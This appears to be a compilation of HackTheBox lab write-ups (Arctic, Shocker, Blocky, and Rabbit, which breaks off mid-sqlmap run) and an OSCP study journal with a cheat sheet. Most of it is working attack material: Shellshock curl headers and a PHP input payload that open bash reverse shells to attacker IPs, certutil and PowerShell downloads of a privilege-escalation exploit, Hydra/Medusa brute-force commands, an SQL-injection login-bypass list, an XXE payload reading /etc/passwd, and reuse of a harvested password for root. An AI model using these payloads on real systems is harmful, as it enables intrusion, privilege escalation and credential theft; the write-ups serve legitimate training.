Serving HTTP on 0.0.0.0 port 80 ...

Inside the ColdFusion admin console we configure three parameters for the scheduled task.

  • Set the URL to our webserver hosting the JSP shell
  • Check the box for Save output to a file
  • Set File to C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

TASK

After submitting we run the task on demand under Actions, and we can see the 200 reponse on our python http server.

TASKRUN

Fire up a netcat listener and we can now browse to our shell at http://10.10.10.11:8500/CFIDE/shell.jsp

root@kali:~/htb/arctic# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49212
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami & hostname
whoami & hostname
arctic\tolis
arctic

And we can grab the user.txt flag on tolis’ desktop.

Privilege Escalation

Tolis doesn’t seem to be an administrator on the system so we will need to escalate. One of the first things I do for privilege escalation on Windows is grab system information, so that we can identify the OS and also see if its missing any patches.

C:\>systeminfo
systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00477-001-0000421-84900
Original Install Date:     22/3/2017, 11:09:45   
System Boot Time:          29/12/2017, 3:34:21   
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
                           [02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.024 MB
Available Physical Memory: 88 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.085 MB
Virtual Memory: In Use:    963 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

From here we identify the box is running Server 2008 R2 and also has no patches installed according to the output under Hotfix(s). Great! Let’s see what exploits we can find. From here you can either Google, use Exploit-DB, searchsploit, or for Windows I like to use something called Windows Exploit Suggester which makes life easy. I won’t go into details on how to use it, check the github to see usage and what all you can feed into it.

After looking through the output I found a few privilege escalation exploits that could work. I settled on looking into MS10-059.

https://www.exploit-db.com/exploits/14610/

The Exploit-DB download only contained source files and no compiled exe. For whatever reason the exploit has an alias name of Chimichurri as referenced on Exploit-DB so I also searched by that and was able to find a compiled exe on Github here. Note that normally you want compile things yourself but I wasn’t able to do so myself without installing a ton of stuff so I decided to forgo it. Based on the source code it looks like the exploit will send us a reverse shell by feeding our IP address and desired port as parameters.

Once again we setup a python http server on Kali and to download to our target a simple powershell script will do the trick.

C:\ColdFusion8>echo $webclient = New-Object System.Net.WebClient >>wget.ps1

C:\ColdFusion8>echo $url = "http://10.10.14.10/chimichurri.exe" >>wget.ps1

C:\ColdFusion8>echo $file = "exploit.exe" >>wget.ps1

C:\ColdFusion8>echo $webclient.DownloadFile($url,$file) >>wget.ps1

C:\ColdFusion8>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

alternatively use

C:\ColdFusion8\runtime\bin>certutil -urlcache -split -f http://10.10.14.10/Chimichurri.exe chimichurri.exe
certutil -urlcache -split -f http://10.10.14.10/Chimichurri.exe chimichurri.exe
**** Online ****
000000 ...
017c00
CertUtil: -URLCache command completed successfully.

We verify the download, start a netcat listener, and run the exploit.

C:\ColdFusion8\runtime\bin>chimichurri.exe
chimichurri.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
C:\ColdFusion8\runtime\bin>chimichurri.exe 10.10.14.10 53
chimichurri.exe 10.10.14.10 53
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
C:\Users\jacco>nc -lvp 53
listening on [any] 53 ...
10.10.10.11: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49897: NO_DATA
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\system

C:\ColdFusion8\runtime\bin>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>type root.txt
type root.txt
ce6*****b90

Author : Jacco Straathof

Reference used : https://www.absolomb.com/2017-12-29-HackTheBox-Arctic-Writeup/

OSCP Journey – 1st month

Date: 02 June – 30 june 2019
PDF: 380/380
Videos: 149/149
Exercises: 30/42
Exploited Machines: 10
Unlocked Networks: 0

The PDF contains 380 pages that spread over 18 chapters. The video’s length is around 7 and half hours spread over 149 Videos. I spent around 30 hours doing the materials and exercises. There are five exercises that I decided to do it later since it requires to do it on the correct machines in the lab. The video and PDF fit together but the videos seem outdated and have some differences with the PDF. If you encounter any issues while following the syntax on course materials, use the syntax on the PDF one.

Exploited Machines (18):

ALICE
ALPHA
BARRY
BETHANY
BOB
BRUCE
CORE
DJ
GAMMA
HELPDESK
HOTLINE
JD
KRAKEN
MAIL
MIKE
ORACLE
RALPH
TOPHAT

I finish the course materials and start attacking lab machines I exploited 2 machines  and without using Metasploit.

My impression  is its simulates real-world scenario. So far all the exploit is known exploit and no puzzle or random guessing needed. All you need is proper enumeration to spot the vulnerability.

There are four hardest machines in the OSCP lab that known as The Big Four. Those machines are Pain, Sufferance, Gh0st and Humble.

LEARNED:

root@kali:~/pwk# rlwrap nc -lvp 9090
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9090
Ncat: Listening on 0.0.0.0:9090
Ncat: Connection from 192.168.1.139.
Ncat: Connection from 192.168.1.139:2675.
Microsoft Windows [Version 10.0.17134.885]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\PENTEST>whoami
whoami
LT-JACCO\jacco

COMMANDS:

root@kali:~/pwk# nmap -vv -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi 10.11.x.1-254

root@kali:~/pwk# gobuster -u http://10.11.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25 -f -s 403

root@kali:~/pwk# dirb http://10.11.x.x/cgi-bin -X .cgi
root@kali:~/pwk# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.11.0.112/443 0>&1 " http://10.11.x.x:80/cgi-bin/admin.cgi
ATTACK FTP

ftp server :

medusa -h 10.11.1.8 -u justine -P /usr/share/wordlists/rockyou.txt -M ftp 
hydra -L USER_LIST -P PASS_LIST -f -o /data/results/10.10.1.22/scans/10.10.1.22_21_ftphydra.txt -u 10.10.1.22 -s 21 ftp 
BRUTE FORCE SSH
hydra -l justine -P /usr/share/wordlists/rockyou.txt -t 10 10.11.1.8 ssh -s 22 
medusa -u root -P /usr/share/wordlists/rockyou.txt -e ns -h 10.10.1.22:22 - 22 -M ss 
SQL INJECTION
 sheet with the Burp Suite Intruder Module. This list is an extended version of SQL Login Bypass Cheat Sheet of Dr. Emin İslam TatlıIf (OWASP Board Member).

root' --
root' #
root'/*
root' or '1'='1
root' or '1'='1'--
root' or '1'='1'#
root' or '1'='1'/*
root'or 1=1 or ''='
root' or 1=1
root' or 1=1--
root' or 1=1#
root' or 1=1/*
root') or ('1'='1
root') or ('1'='1'--
root') or ('1'='1'#
root') or ('1'='1'/*
root') or '1'='1
root') or '1'='1'--
root') or '1'='1'#
root') or '1'='1'/*
or 1=1
or 1=1--
or 1=1#
or 1=1/*
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
" or 1=1
" or 1=1--
" or 1=1#
" or 1=1/*
1234 ' AND 1=0 UNION ALL SELECT 'root', '81dc9bdb52d04dc20036dbd8313ed055
root" --
root" #
root"/*
root" or "1"="1
root" or "1"="1"--
root" or "1"="1"#
root" or "1"="1"/*
root" or 1=1 or ""="
root" or 1=1
root" or 1=1--
root" or 1=1#
root" or 1=1/*
root") or ("1"="1
root") or ("1"="1"--
root") or ("1"="1"#
root") or ("1"="1"/*
root") or "1"="1
root") or "1"="1"--
root") or "1"="1"#
root") or "1"="1"/*
XXE
<?xml version="1.0" encoding="UTF-8"?>

 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root><name>&xxe;</name><tel>test</tel><email>&xxe;</email><password>tst</password></root>
LFI

See the source of any php

http://IP/index.php?m=php://filter/convert.base64-encode/resource=index
RFI

Null Bytes

http://10.11.1.24//classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00
curl -s --data "<?php system('bash -i >& /dev/tcp/172.16.237.245/4545 0>&1
') ?>" "http://10.10.10.10/index.php?ACS_path=php://input%00"
BRUTE FORCE WEB
hydra 192.168.30.147 -l '' -P /usr/share/wordlists/fasttrack.txt -s 8080 http-form-post "/phpliteadmin.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect:H=Cookie : PHPSESSID=bq8vrl6updklfdvv21reb8s63j"
htaccess brute force
medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/admin -T 10

TIPS:

  • You MUST do the course materials and exercises, it’s a GEM. Even when you already familiar with most of the topics, it will become a refresher. When you attacking machines in the lab it will help you spot the “vulnerability” faster. I think it took around 30-50 hours to complete it. Sparing your time at the beginning for this can save your day later in the lab.
  • In course materials and exercises, some of the tools are outdated and have version issues with Offsec Kali VM. If you encounter any issues, search the problem on the Offsec forum. Most of them are known issues and there are solutions available there.
  • Don’t just do nothing waiting for Nmap scan finish. Make some guess like checking if web service opens using the browser, checking if FTP, SSH or any other common services open using NC and do some manual enumeration while waiting.
  • NMAP Scripts are powerful tools to check for vulnerability. Get familiar with it and play with the scripts. All of the scripts located in /usr/share/nmap/scripts/ directory.
  • Most of the public exploits won’t work without modifying it. It usually has hardcoded IP address and Path. Make sure you understand the exploit and change it as necessary.
  • When compiling exploit, compile it on the environment (OS/kernel) that as close as possible with the target machine. If the target machine didn’t have the compiler, the workaround could be downloading the same OS as target machine, install and compile it there, but it takes a lot of times. I found out that some of Vulnhub VM Machines that similar to OSCP can be used to compile the exploit too. I am using Kioptrix machines to compile the old exploit and it works so far. Saving time on downloading and installing new OS.
  • MSF is a powerful tool even though its restricted in the exam. Use MSF for post-exploitation, it makes your life easier to upload and download the file using Meterpreter shell. It also has many post-exploitation modules that really helpful.
  • For some of the straightforward machines, the methodology is simple: NMAP -> check service or software version for known vulnerability (searchsploit or google) -> read and understand the public exploit code -> make the necessary changes -> exploit.
  • Google anything that you find suspicious or anything that you don’t know at all.
  • Spare your time to make write up after you exploit a machine. It will make you understand better your current methodology and how to improve it. Someday you may also encounter similar machines and it will help you. I use CherryTree for documenting all.

Author: Jacco Straathof

HTB – Shocker

Today we are going to solve another CTF challenge “Shocker” which is lab presented by Hack the Box for making online penetration practices according to your experience level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab, therefore, we have chosen retried Shocker lab.

Level: Beginners

Task: find user.txt and root.txt file in the victim’s machine.

Let’s  start with a basic nmap scan

c:\Users\jacco>nmap -sC -sV 10.10.10.56
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 22:03 W. Europe Summer Time
Nmap scan report for 10.10.10.56
Host is up (0.031s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.04 seconds

Next, we use the dirb tool of kali to enumerate the directories and found some important directories such as /cgi-bin, index.html, server-status

root@kali:~/htb/shocker# dirb http://10.10.10.56
-----------------
DIRB v2.22 
By The Dark Raver
-----------------
START_TIME: Tue May 28 12:56:05 2019
URL_BASE: http://10.10.10.56/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294) 
+ http://10.10.10.56/index.html (CODE:200|SIZE:137) 
+ http://10.10.10.56/server-status (CODE:403|SIZE:299) 
-----------------
END_TIME: Tue May 28 12:58:24 2019
DOWNLOADED: 4612 - FOUND: 3

root@kali:~/htb/shocker# dirb http://10.10.10.56/cgi-bin -X .sh
-----------------
DIRB v2.22 
By The Dark Raver
-----------------
START_TIME: Tue May 28 13:02:27 2019
URL_BASE: http://10.10.10.56/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/cgi-bin/ ----
+ http://10.10.10.56/cgi-bin/user.sh (CODE:200|SIZE:118) 
-----------------
END_TIME: Tue May 28 13:04:47 2019
DOWNLOADED: 4612 - FOUND: 1
root@kali:~/htb/shocker# curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

15:57:06 up 6:12, 0 users, load average: 0.00, 0.00, 0.00

Let’s run the Shellshock command against this file and see if we can pull a reverse shell. I looked across the internet to find the string that causes the Shellshock bug and whipped something together.

The command I used looked like this:

root@kali:~/htb/shocker# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.14/443 0>&1 " http://10.10.10.56:80/cgi-bin/user.sh
That invoked Shellshock, called a reverse shell to my netcat listener, and designated that it run against the file we found.
root@kali:~/htb/shocker# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.56.
Ncat: Connection from 10.10.10.56:39634.
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

we can also do a manual exploitation with python script from https://www.exploit-db.com/exploits/34900
root@kali:~/htb/shocker# ./shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.3 lport=443 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

10.10.10.56> ls 
user.sh

10.10.10.56> cd /home
10.10.10.56> ls
shelly

10.10.10.56> cd shelly
10.10.10.56> cat user.txt
2ec*****233

10.10.10.56> sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl

10.10.10.56> sudo /usr/bin/perl -e 'exec "/bin/sh"'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)

10.10.10.56> cat /root/root.txt
52c*****a467

Author: Jacco Straathof

HTB – Blocky

Today we are going to solve another CTF challenge “Blocky ” which is available online for those who want to increase their skill penetration testing and black box testing. Blocky is a retried vulnerable lab presented by Hack the Box

Level : Easy

Since these labs are online available therefore they have static IP and IP of blocky is 10.10.10.37 so let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.37
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 19:50 W. Europe Summer Time
Nmap scan report for 10.10.10.37
Host is up (0.030s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft &#8211; Under Construction!
8192/tcp closed sophos
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.67 seconds

Knowing port 80 is open in victim’s network I opened it’s IP in the browser but didn’t get any remarkable clue on its welcome page.

Next, we use wfuzz to enumerate the directories and found some important directories such as /phpmyadmin, /wp-admin, /plugin/files and etc which you can confirm from below image.

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.37/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.37/FUZZ
Total requests: 220551

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000003: C=200 313 L 3592 W 52256 Ch "# Copyright 2007 James Fisher"
000004: C=200 313 L 3592 W 52256 Ch "#"
000001: C=200 313 L 3592 W 52256 Ch "# directory-list-2.3-medium.txt"
000002: C=200 313 L 3592 W 52256 Ch "#"
000005: C=200 313 L 3592 W 52256 Ch ""
000181: C=301 9 L 28 W 309 Ch "wiki"
000232: C=301 9 L 28 W 315 Ch "wp-content"
000510: C=301 9 L 28 W 312 Ch "plugins"
000777: C=301 9 L 28 W 316 Ch "wp-includes"
001064: C=301 9 L 28 W 315 Ch "javascript"
007171: C=301 9 L 28 W 313 Ch "wp-admin"
010816: C=301 9 L 28 W 315 Ch "phpmyadmin"
013818: C=404
package com.myfirstplugin;

public class BlockyCore {
public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
public BlockyCore() {}
public void onServerStart() {}
public void onServerStop() {}
public void onPlayerJoin()
{
sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
}
public void sendMessage(String username, String message) {}
}

Then I explore http://10.10.10.37/phpmyadmin and login into phpmyadmin server using above credential

Then opened the WordPress database for stealing username from here and I found a user login: Notch with user Id 1.

Now I try to access victim’s system  shell through SSH

PS C:\Users\jacco> ssh notch@10.10.10.37
notch@10.10.10.37's password:8YsqfCTnvxAUeduzjNSXe22
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.

Last login: Sun Dec 24 09:34:35 2017
notch@Blocky:~$ cat user.txt
59f*****3cd5

notch@Blocky:~$ sudo -l
[sudo] password for notch:8YsqfCTnvxAUeduzjNSXe22
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

notch@Blocky:~$ sudo su
root@Blocky:/home/notch# cd ..
root@Blocky:/home# cd ..
root@Blocky:/# cd root
root@Blocky:~# ls
root.txt
root@Blocky:~# cat root.txt
0a9*****cd5f

Author: Jacco Straathof

HTB – Rabbit

Today we are going to solve another CTF challenge “Rabbit” which is categories as retired lab presented by Hack the Box for making online penetration practices.

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Rabbit is is 10.10.10.71 so let’s start with  a basic nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.71
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-13 15:54 W. Europe Summer Time
Nmap scan report for 10.10.10.71
Host is up (0.032s latency).
Not shown: 976 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.20], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:36+00:00; +5h00m01s from scanner time.
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-13 18:55:06Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:33+00:00; +5h00m01s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
587/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.20], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2019-05-13T18:57:34+00:00; +5h00m01s from scanner time.
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
808/tcp open ccproxy-http?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3306/tcp open mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6003/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
Service Info: Hosts: Rabbit.htb.local, RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

Host script results:
|_clock-skew: mean: 5h00m01s, deviation: 0s, median: 5h00m00s
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.84 seconds
Let’s enumerate the web server with Gobuster:
root@kali:~/htb/rabbit# gobuster -e -k -u http://10.10.10.71:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.71:8080/
[+] Threads : 20
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Expanded : true
[+] Timeout : 10s
=====================================================
2019/05/13 10:30:07 Starting gobuster
=====================================================
http://10.10.10.71:8080/index (Status: 200)
http://10.10.10.71:8080/Index (Status: 200)
http://10.10.10.71:8080/favicon (Status: 200)
http://10.10.10.71:8080/%!(NOVERB) (Status: 403)
http://10.10.10.71:8080/INDEX (Status: 200)
http://10.10.10.71:8080/joomla (Status: 301)
http://10.10.10.71:8080/*checkout* (Status: 403)
http://10.10.10.71:8080/complain (Status: 301)

We found a Complain Management System



root@kali:~/htb/rabbit# searchsploit 'complain management system'
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Complain Management System - Hard-Coded Credentials / Blind SQL injection | exploits/php/webapps/42968.txt
Complain Management System - SQL injection | exploits/php/webapps/41131.txt
root@kali:~/htb/rabbit# cat /usr/share/exploitdb/exploits/php/webapps/42968.txt 
# Exploit Title : Complain Management System Blind SQL Injection
# Date: 10 October 2017
# Exploit Author: havysec 
# Tested on: ubuntu14.04
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files


## About The Product :
Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.

## Vulnerability :
The functions.php file line 88 has hardcoded admin credentials.
elseif($uType == 'admin'){
//$_SESSION['user_id'] = $row['sid'];
if($userName == 'admin' && $password == 'admin123'){
$_SESSION['user_id'] = 0;
$_SESSION['user_name'] = 'Administrator';
$_SESSION['user_type'] = 'admin';
header('Location: '.WEB_ROOT.'index.php');
exit;

Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.

As we read, the first thing will be to register as ‘ Customer ‘ and with the cookie PHPSESSID + sqlmap get access to the databases.

.

c:\SQLMAP>type rabbit.req
POST /complain/process.php?action=assignComplain HTTP/1.1
Host: 10.10.10.71:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.71:8080/complain/view.php?mod=admin&view=viewByCompID&compId=10
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Connection: close
Cookie: PHPSESSID=82k6csju4c0ccdepcbnan5k602
Upgrade-Insecure-Requests: 1

compId=10&compDesc=&engId=6&btnLogin=+Assing+Complain+
c:\SQLMAP>
c:\SQLMAP>python sqlmap.py -r rabbit.req --dbms=mysql -p "compId" --risk=3 --level=3 --batch -D secret --dump
___
__H__
___ ___[(]_____ ___ ___ {1.2.11.19#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:16:49 /2019-05-15/

[15:16:49] [INFO] parsing HTTP request from 'rabbit.req'
[15:16:49] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://10.10.10.71:8080/complain/view.php?mod=admin&view=compDetails'. Do you want to follow? [Y/n] Y
